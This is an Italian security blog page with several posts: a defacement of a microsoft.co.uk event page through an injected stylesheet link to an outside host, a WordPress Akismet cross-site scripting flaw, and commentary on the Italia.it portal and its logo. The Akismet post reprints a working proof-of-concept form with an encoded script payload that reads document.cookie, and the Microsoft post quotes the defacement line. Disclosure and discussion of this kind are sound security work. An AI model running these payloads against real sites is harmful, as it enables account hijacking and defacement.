Cronache di un deface annunciato
(ma solo perchè non è difficile trovare pagine sui domini microsoft che non siano affette da problemi del genere, che MS debba rivedere le sue politiche di assunzione dei programmatori?)

Lo screen

Fig.1: Io amo questi Sauditi!!

La notizia

Brutto risveglio (è stato qualche giorno fà ma facciamo finta di nulla ) per il povero amministratore del dominio microsoft.co.uk.

Come puntualmente segnalato da Zone-H (e “mirroraro” per i posteri) il deface ha avuto inizio settimana scorsa, ma il problema è rientrato (togliendo la pagina -_-’ ), e si esplica, semplicisticamente parlando, nell’aggiunta di un’innocua riga di codice alla seguente pagina:

http://www.microsoft.co.uk/events/net/eventdetail.aspx?eventid=8399

La riga di codice di cui parlavo non fà altro che modificare lo stylesheet:

<link xhref=http://h.1asphost.com/remoter/css.css type=text/css rel=stylesheet>

Molto molto semplice direi.

Dando un’occhiata alla pagina PreRegister.aspx si nota come il parametro V2 possa essere facilmente utilizzato per effettuare una Sql Injection oppure un XSS, come testabile sul link “microsoft.co.uk/events/net/PreRegister.aspx” ora purtroppo non più disponibile.

Ma non mi dilungo troppo visto che l’attacker s’è preso la bega di fare un mini filmatino didattico sull’accaduto, visualizzabile qui sotto (in scarsissima qualità purtroppo)

…oppure scaricando lo zip uppato su RapidShare
(purtroppo il link fornito su ubase.com non funziona più)

Quando si dice HandsOn Buon WebCast

Ed eccovi qua il bug del giorno, che mi tocca in quanto utilizzatore sfegatato della piattaforma wordpress e del suo inseparabile plugin anti spam (molto da migliorare IMHO!)

WordPress 2.1.3 Akismet Vulnerabilità - Exploit

Gli utenti WordPress che utilizzano il plugin Askimet per combattere lo spam nei commenti farebbero bene a sostituire il plugin “buggato” rilasciato di default con la versione 2.1.3 di WP con Askimet v2.0.2.

Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity

Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.

<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%22><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41) )</script>” type=”text”> <input id=”key” name=”key” size=”15″ maxlength=”12″ value=”1337″> <input name=”submit” value=”Update options »” type=”submit”> </form> </body> </html>

Payload will alert(document.cookie)

Just a PoC, I’m plainly too tired to write full code for making a post or stuff, thanks
UPDATE: The Patch is buggy, Workaround for the wrong “Akismet Link” on your Wordpress Dashboard is avaible here.

Ma è buggata, come avete letto, anche la patch (succede anche nelle migliori famiglie)

Antonio Trigiani w3bL0g - Ingegneria Informatica Virale » Blog Archive » Bug e FIX nell’aggiornamento ad Akismet v2.0.2

Bene, se avete eseguito questo aggiornamento sappiate che è stato inserito un nuovo bug.Per essere più precisi la riga 529

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, clean_url(”$link?page=akismet-admin”), number_format($count) ).’</p>’;

Occorre sostituirla con il seguente workaround:

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, “$link?page=akismet-admin”, number_format($count) ).’</p>’;

Ora, qualcuno saprebbe dirmi in quali altri paradigmi di programmazione collaborativa succedono cose di questo genere?

Patch -> Fix -> Patch -> (e) Fix a poche ore l’uno dall’altro mentre Microsoft impiega settimane… volete altre dimostrazioni? Aspettate pochissimo…

Logo del portale più inutile nel panorama eGov europeo…. 100K€ con MasterCard

Oggi il Premier Prodi ed il ministro Rutelli hanno presentato a Roma il nuovo logo turistico dell’Italia. Bruttino, dal mio punto di vista, speriamo non sia costato tutti i 100mila euro del bando.

(via repubblica.it)

Pagare IBM per l’infrastruttura del portale…. 8M€ con MasterCard

Un horror di qualità
Qui l’opinione, condivisibile, di Oliviero Toscani sul nuovo logo turistico dell’Italia.
È l’ennesima occasione mancata per il Paese, un’operazione mal riuscita e gestita da incompetenti, un piccolo marchietto che rispecchia perfettamente l’Italia di oggi, presuntuosa e poco consistente.

Update: Da non perdere il post di Leonardo sul nuovo logo.

(immagine di Rododentro)
(via EmmeBi)

Crakkare un portale costato agli italiani 45M€ non ha prezzo!!!

A quanto pare anche il nuovo sito Italia.it adotta misure di sicurezza inadeguate. Ecco uno screenshot:

(A causa di problemi avuti in precedenza non cito il link che mostra la vulnerabilità)

Il sito nuovo di zecca è soggetto ad una vulnerabilità Cross Site Scripting a causa di un superficiale controllo degli input dell’utente. Il filtro esiste ma i tag filtrati non sono sufficienti ad impedire la manipolazione di uno script javascript per sferrare un attachi XSS.

Prima lanciamo il sito, poi pensiamo alla sicurezza. Funziona così? Quando inizieranno a prendere sul serio la sicurezza informatica?
(via explo.it)